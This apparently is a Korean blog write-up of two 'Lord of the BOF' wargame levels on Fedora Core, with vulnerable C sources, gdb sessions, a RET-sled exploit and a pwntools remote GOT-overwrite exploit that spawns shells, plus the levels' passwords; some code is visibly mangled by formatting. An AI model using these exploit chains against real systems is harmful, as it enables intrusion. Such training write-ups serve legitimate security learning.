반응형
반응형
반응형

ID | dark_stone

PW | let there be light


으로 로그인합니다.



$ ls -l


를 이용해  어떤 파일과 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합니다.




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
    The Lord of the BOF : The Fellowship of the BOF 
    - cruel
    - Local BOF on Fedora Core 4
    - hint : no more fake ebp, RET sleding on random library
*/
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
 
int main(int argc, char *argv[])
{
    char buffer[256];
 
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
 
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);
}
 
cs



[dark_stone@Fedora_2ndFloor ~]$ gdb -q cruel

(no debugging symbols found)

Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b* main+109

Breakpoint 1 at 0x8048451

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Starting program: /home/dark_stone/cruel AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

(no debugging symbols found)

(no debugging symbols found)

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


Breakpoint 1, 0x08048451 in main ()

(gdb) x/20x $esp-20

0xbf85c778: 0x41414141 0x41414141 0x41414141 0x41414141

0xbf85c788: 0x41414141 0x007bad00 0x00000002 0xbf85c814

0xbf85c798: 0xbf85c820 0xbf85c7d0 0x00795898 0x007a3878

0xbf85c7a8: 0xb7f5e690 0x00000001 0x008caff4 0x007a2ca0

0xbf85c7b8: 0x08048454 0xbf85c7e8 0xbf85c790 0x007bad44

(gdb) x/2x 0x008caff4

0x8caff4: 0x008cad3c 0x007bab16



0x008caff4가 0x008cad3c를 가리키고 있다.

ret sleding으로 쓱 싹



0x08048450 <main+108>: leave  

0x08048451 <main+109>: ret    



(gdb) b main

Breakpoint 1 at 0x80483ed

(gdb) r

Starting program: /home/dark_stone/cruel 

(no debugging symbols found)

(no debugging symbols found)


Breakpoint 1, 0x080483ed in main ()

(gdb) p execl

$1 = {<text variable, no debug info>} 0x832d68 <execl>




1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
#include <stdio.h>
 
#include <stdlib.h>
 
 
 
int main(void)
 
{
 
        setreuid(geteuid(),geteuid());
 
        setregid(getegid(),getegid());
 
        system("/bin/sh");
 
}
cs

[dark_stone@Fedora_2ndFloor ~]$ gcc -o `python -c 'print "\x3c\xad\x8c\x00"'` ex.c


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import os
import struct
 
 
p32 = lambda x: struct.pack("<I", x)
 
target = "/home/dark_stone/cruel"
 
ret = 0x8048451
execl = 0x832d68
 
payload = 'A' * 260
 
payload += p32(ret) * 7
payload += p32(execl)
 
os.execv(target, (target, payload[:-1]))
 
cs


[dark_stone@Fedora_2ndFloor ~]$ vi ex.py

[dark_stone@Fedora_2ndFloor ~]$ python ex.

python: can't open file 'ex.': [Errno 2] No such file or directory

[dark_stone@Fedora_2ndFloor ~]$ python ex.py

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQ�Q�Q�Q�Q�Q�Q�h-�

sh-3.00$ my-pass

euid = 501

come on, come over


반응형
반응형


ID | evil_wizard

PW | get down like that


으로 로그인합니다.



$ ls -l


를 이용해  어떤 파일과 폴더가 있는지 확인하고,


$ cat [문제이름].c


를 이용해 소스코드를 확인합니다.





1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
/*
    The Lord of the BOF : The Fellowship of the BOF 
    - dark_stone
    - Remote BOF on Fedora Core 3 
    - hint : GOT overwriting again
    - port : TCP 8888
*/
 
#include <stdio.h>
 
// magic potion for you
void pop_pop_ret(void)
{
    asm("pop %eax");
    asm("pop %eax");
    asm("ret");
}
 
int main()
{
    char buffer[256];
    char saved_sfp[4];
    int length; 
    char temp[1024];
 
    printf("dark_stone : how fresh meat you are!\n");
    printf("you : ");
    fflush(stdout);
 
    // give me a food
    fgets(temp, 1024, stdin);
 
    // for disturbance RET sleding
    length = strlen(temp);
   
    // save sfp 
    memcpy(saved_sfp, buffer+2644);
 
    // overflow!!
    strcpy(buffer, temp);
 
    // restore sfp 
    memcpy(buffer+264, saved_sfp, 4);
 
    // disturbance RET sleding
    memset(buffer+length, 0, (int)0xff000000 - (int)(buffer+length));
 
    // buffer cleaning 
    memset(0xf6ffe00000xf7000000-0xf6ffe000);
 
    printf("%s\n", buffer);
}
 
cs


이번 문제는 nc [ip] 8888을 통해 ex를 하면 되네요.


이전 문제와 같은 방법으로 풀어보겠습니다.


0x08048620 <main+296>: lea    eax,[ebp-264]

0x08048626 <main+302>: push   eax

0x08048627 <main+303>: push   0x8048745

0x0804862c <main+308>: call   0x8048408 <_init+104>

0x08048631 <main+313>: add    esp,0x10

0x08048634 <main+316>: leave  

0x08048635 <main+317>: ret    

0x08048636 <main+318>: nop    

0x08048637 <main+319>: nop    

End of assembler dump.


printf plt 주소를 구합니다.


더미는 264 + 4 바이트만큼 주면 되겠네요.



0x080485a0 <main+168>: lea    eax,[ebp-1304]

0x080485a6 <main+174>: push   eax

0x080485a7 <main+175>: lea    eax,[ebp-264]

0x080485ad <main+181>: push   eax

0x080485ae <main+182>: call   0x8048438 <_init+152>


strcpy plt 주소를 구합니다.



(gdb) disas pop_pop_ret 

Dump of assembler code for function pop_pop_ret:

0x080484f0 <pop_pop_ret+0>: push   ebp

0x080484f1 <pop_pop_ret+1>: mov    ebp,esp

0x080484f3 <pop_pop_ret+3>: pop    eax

0x080484f4 <pop_pop_ret+4>: pop    eax

0x080484f5 <pop_pop_ret+5>: ret    

0x080484f6 <pop_pop_ret+6>: leave  

0x080484f7 <pop_pop_ret+7>: ret   


ppr 주소 0x080484f3



(gdb) x/i 0x8048408

0x8048408 <_init+104>: jmp    ds:0x804984c


printf got 0x804984c



(gdb) b main

Breakpoint 1 at 0x8048501

(gdb) r

Starting program: /home/evil_wizard/dark_stone 

(no debugging symbols found)...(no debugging symbols found)...

Breakpoint 1, 0x08048501 in main ()

(gdb) p system

$1 = {<text variable, no debug info>} 0x7507c0 <system>


system 주소 0x007507c0


이제 system 주소가 되어줄 조각들을 구해봅시다.



[evil_wizard@Fedora_1stFloor ~]$ objdump -s dark_stone | grep "c0" --color=auto

 8048148 03000000 0e000000 0c000000 05000000  ................

 80481b4 3c000000 68980408 04000000 11001700  <...h...........

 8048338 1069690d 00000200 8c000000 00000000  .ii.............

 8048348 2c980408 060c0000 68980408 05020000  ,.......h.......

 80483a0 5589e583 ec08e8c1 000000e8 14010000  U...............

 80483e8 ff254498 04086810 000000e9 c0ffffff  .%D...h.........


0x80483f4



[evil_wizard@Fedora_1stFloor ~]$ objdump -s dark_stone | grep "07" --color=auto

 8048178 03000000 07000000 08000000 06000000  ................


0x804817c



[evil_wizard@Fedora_1stFloor ~]$ objdump -s dark_stone | grep "75" --color=auto

 8048114 2f6c6962 2f6c642d 6c696e75 782e736f  /lib/ld-linux.so

 80482b4 75740066 67657473 006d656d 63707900  ut.fgets.memcpy.


0x80482b4



[evil_wizard@Fedora_1stFloor ~]$ objdump -s dark_stone | grep "00" --color=auto

 8048124 2e3200                               .2.             

 8048128 04000000 10000000 01000000 474e5500  ............GNU.

 8048138 00000000 02000000 02000000 05000000  ................


0x8048138




"/bin/sh\x00" 찾기


1
2
3
4
5
6
7
8
9
10
#include "stdio.h"
#include "string.h"
 
int main(void){
 
        long shell = 0x7507c0;  // <=== system()함수의 주소
        while(memcmp((void*)shell,"/bin/sh\x00",8)) shell++;
        printf("\"bin/sh\" is at 0x%lx\n", shell);
}
 
cs


[evil_wizard@Fedora_1stFloor ~]$ vi find_.c

[evil_wizard@Fedora_1stFloor ~]$ gcc -o find_ find_.c 

[evil_wizard@Fedora_1stFloor ~]$ ./find_ 

"bin/sh" is at 0x833603



이렇게 모두 구해서 이전 문제 익스에 사용한 코드를 재사용 하면.


익스가 안된다....



계획변경


바로 got를 덮지 않고, 먼저 bss영역에 덮은 뒤에 다시 그 값을 got를 덮도록 한다.



[evil_wizard@Fedora_1stFloor ~]$ readelf -S dark_stone

There are 28 section headers, starting at offset 0xa68:


Section Headers:

  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al

  [ 0]                   NULL            00000000 000000 000000 00      0   0  0

  [ 1] .interp           PROGBITS        08048114 000114 000013 00   A  0   0  1

  [ 2] .note.ABI-tag     NOTE            08048128 000128 000020 00   A  0   0  4

  [ 3] .hash             HASH            08048148 000148 00004c 04   A  4   0  4

  [ 4] .dynsym           DYNSYM          08048194 000194 0000e0 10   A  5   1  4

  [ 5] .dynstr           STRTAB          08048274 000274 000096 00   A  0   0  1

  [ 6] .gnu.version      VERSYM          0804830a 00030a 00001c 02   A  4   0  2

  [ 7] .gnu.version_r    VERNEED         08048328 000328 000020 00   A  5   1  4

  [ 8] .rel.dyn          REL             08048348 000348 000018 08   A  4   0  4

  [ 9] .rel.plt          REL             08048360 000360 000040 08   A  4  11  4

  [10] .init             PROGBITS        080483a0 0003a0 000017 00  AX  0   0  4

  [11] .plt              PROGBITS        080483b8 0003b8 000090 04  AX  0   0  4

  [12] .text             PROGBITS        08048448 000448 0002ac 00  AX  0   0  4

  [13] .fini             PROGBITS        080486f4 0006f4 00001a 00  AX  0   0  4

  [14] .rodata           PROGBITS        08048710 000710 000039 00   A  0   0  4

  [15] .eh_frame         PROGBITS        0804874c 00074c 000004 00   A  0   0  4

  [16] .ctors            PROGBITS        08049750 000750 000008 00  WA  0   0  4

  [17] .dtors            PROGBITS        08049758 000758 000008 00  WA  0   0  4

  [18] .jcr              PROGBITS        08049760 000760 000004 00  WA  0   0  4

  [19] .dynamic          DYNAMIC         08049764 000764 0000c8 08  WA  5   0  4

  [20] .got              PROGBITS        0804982c 00082c 000004 04  WA  0   0  4

  [21] .got.plt          PROGBITS        08049830 000830 00002c 04  WA  0   0  4

  [22] .data             PROGBITS        0804985c 00085c 00000c 00  WA  0   0  4

  [23] .bss              NOBITS          08049868 000868 00000c 00  WA  0   0  4

  [24] .comment          PROGBITS        00000000 000868 000126 00      0   0  1

  [25] .shstrtab         STRTAB          00000000 00098e 0000d7 00      0   0  1

  [26] .symtab           SYMTAB          00000000 000ec8 0004f0 10     27  44  4

  [27] .strtab           STRTAB          00000000 0013b8 0002d6 00      0   0  1



bss영역 0x08049868


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
#fc3 got_overwrite
from pwn import *
 
= remote("192.168.0.0"8888)
 
printf_plt = 0x8048408
printf_got = 0x804984c
strcpy_plt = 0x8048438
ppr = 0x80484f3
 
bss = 0x8049868
 
binsh = 0x833603
 
payload = 'A' * 268
 
 
payload += p32(strcpy_plt)
payload += p32(ppr)
payload += p32(bss + 0)
payload += p32(0x80483f4)
 
payload += p32(strcpy_plt)
payload += p32(ppr)
payload += p32(bss + 1)
payload += p32(0x804817c)
 
payload += p32(strcpy_plt)
payload += p32(ppr)
payload += p32(bss + 2)
payload += p32(0x80482b4)
 
payload += p32(strcpy_plt)
payload += p32(ppr)
payload += p32(bss + 3)
payload += p32(0x8048138)
 
payload += p32(strcpy_plt)
payload += p32(ppr)
payload += p32(printf_got)
payload += p32(bss)
 
payload += p32(printf_plt)
payload += "AAAA"
payload += p32(binsh)
 
print(p.recvuntil("u :"))
print(payload)
p.sendline(payload)
 
p.interactive()
 
cs

mandu@mandu-VirtualBox:~/ex_pwn$ python fc3_hell.py 
[+] Opening connection to 192.168.0.10 on port 8888: Done
dark_stone : how fresh meat you are!
you :
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8\x84\x0��h\x98\x0��8\x84\x0��i\x98\x0|\x81\x08\x84\x0��j\x98\x0\xb4\x82\x08\x84\x0��k\x98\x08\x81\x08\x84\x0��L\x98\x0h\x98\x\x84\x0AAAA\x036\x83\x00
[*] Switching to interactive mode
 $ my-pass
euid = 505
let there be light

예에~




반응형

+ Recent posts